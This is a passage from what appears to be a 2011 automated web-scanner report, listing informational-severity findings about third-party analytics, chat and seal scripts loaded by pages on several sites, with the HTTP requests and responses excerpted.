P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:53 GMT
Content-Length: 52775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<!-- jquery framework -->
<script type="text/javascript" language="JavaScript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<!--elqImg-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqImg.js"></script>
<!--elqCfg-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCfg.js"></script>
...[SNIP]...
<!--astadia-gated-forms-->
<script type="text/javascript" language="Javascript" src="http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js"></script>
...[SNIP]...
<!--elqCpers-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCPers.js"></script>
...[SNIP]...
<!--elqCpers-->
<script type="text/javascript" language="JavaScript" src="http://img.en25.com/Web/KronosIncorporated/elqCPers.js"></script>
...[SNIP]...
24.30. https://store.manageengine.com/service-desk/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /service-desk/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /service-desk/index.html HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:05 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 11:59:05 GMT
ETag: "4d5be12-745c-4a16c77c85440"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:14:05 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29788

<html><!-- InstanceBegin template="/Templates/store.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>ManageEngine ServiceDesk Plus tore</title>
<!-
...[SNIP]...
<link href="https://www.manageengine.com/products/service-desk/style/store-style.css" rel="stylesheet" type="text/css" />
<script src="https://mestore.store.zoho.com/storeapi.na" type="text/JavaScript"></script>
...[SNIP]...
</script>
<script language="javascript" src="https://iplocation.zoho.com"></script>
...[SNIP]...
24.31. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3-2
Set-Cookie: PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/
Vary: Accept-Encoding
Content-Length: 32979

<!DOCTYPE html>
<html>
<head>
<title>Tengrinews.kz : .............. .................... .... ..............</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta
...[SNIP]...
<!-- begin of Top100 code -->
<script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?2378577"></script>
...[SNIP]...
<!-- Yandex.Metrika -->
   <script src="http://mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
24.32. http://webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webalta.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:19:59 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:03:11 GMT
ETag: "34d88a0-75ce-4db57f1f"
Accept-Ranges: bytes
Content-Length: 30158
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>................
...[SNIP]...
<![endif]-->
   
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
<!-- Yandex.Metrika -->
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
24.33. http://webalta.ru/news.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webalta.ru
Path:   /news.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news.html HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:06 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:18:12 GMT
ETag: "34d8a3b-6471-4db582a4"
Accept-Ranges: bytes
Content-Length: 25713
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>.. .............
...[SNIP]...
<![endif]-->
   
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
<!-- Yandex.Metrika -->
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
24.34. https://www.controlscan.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=180386997.730761609.1303732833.1303732833.1303732833.1; __utmc=180386997; fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
24.35. https://www.controlscan.com/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php?itemsadded=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
24.36. https://www.controlscan.com/checkout_invalid.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout_invalid.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout_invalid.php?pid=&reason=Card%20Number%20was%20not%20between%2013%20and%2016%20digits HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:56:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
24.37. https://www.controlscan.com/pcicompliance.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /pcicompliance.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pcicompliance.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.1.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:54:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
24.38. https://www.controlscan.com/shoppingcart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /shoppingcart.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shoppingcart.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/pcicompliance.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.2.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
24.39. http://www.criticalwatch.com/company/critical-watch-career.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-career.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/critical-watch-career.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-security.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:32 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.40. http://www.criticalwatch.com/company/critical-watch-contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-contact.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/critical-watch-contact.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-career.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:34 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 14936


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Le5HQcAAAAAALOm71gVj_YwLY75DVJVpFip8USF">

   </script>
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.41. http://www.criticalwatch.com/company/critical-watch-security.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/critical-watch-security.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/critical-watch-security.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:31 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
